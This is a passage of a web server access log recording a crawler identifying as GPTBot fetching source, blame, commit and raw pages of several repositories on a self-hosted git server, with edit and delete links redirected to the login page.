GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:12:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 122] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:16:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:12:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 11520] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:16:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 558] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:12:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 11316] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:16:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12759] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:12:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 13129] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:12:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12847] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12702] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:16:12:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:16:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 12847] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:12:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 12758] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:16:12:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:16:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore?display=source" [Client 74.7.227.38] [Length 11095] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" +[17/Feb/2026:16:12:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10435] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:12:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:16:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10237] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:12:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:16:12:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 10236] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 10436] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:12:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 1182] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:12:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" [Client 74.7.227.38] [Length 13025] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:16:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 13640] [Gzip 7.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:12:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" [Client 74.7.227.38] [Length 1611] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:16:12:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" [Client 74.7.227.38] [Length 12700] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:16:12:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py?display=source" [Client 74.7.227.38] [Length 16178] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py" +[17/Feb/2026:16:12:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py?display=source" [Client 74.7.227.38] [Length 14303] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py" +[17/Feb/2026:16:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/Dockerfile" [Client 74.7.227.38] [Length 11786] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" +[17/Feb/2026:16:12:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/package.json" +[17/Feb/2026:16:12:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/package.json" +[17/Feb/2026:16:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:12:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11918] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml" +[17/Feb/2026:16:12:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13021] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" +[17/Feb/2026:16:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/update_status.py" +[17/Feb/2026:16:12:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py?display=source" [Client 74.7.227.38] [Length 13020] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" +[17/Feb/2026:16:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html?display=source" [Client 74.7.227.38] [Length 38034] [Gzip 9.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:16:12:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10889] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:16:12:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/package.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/package.json" +[17/Feb/2026:16:12:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/package.json" +[17/Feb/2026:16:12:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" +[17/Feb/2026:16:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/Dockerfile" +[17/Feb/2026:16:12:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" +[17/Feb/2026:16:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/Dockerfile" +[17/Feb/2026:16:12:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/Dockerfile" [Client 74.7.227.38] [Length 9813] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" +[17/Feb/2026:16:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/Dockerfile" [Client 74.7.227.38] [Length 997] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" +[17/Feb/2026:16:12:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/Dockerfile" +[17/Feb/2026:16:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10312] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:16:12:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10908] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 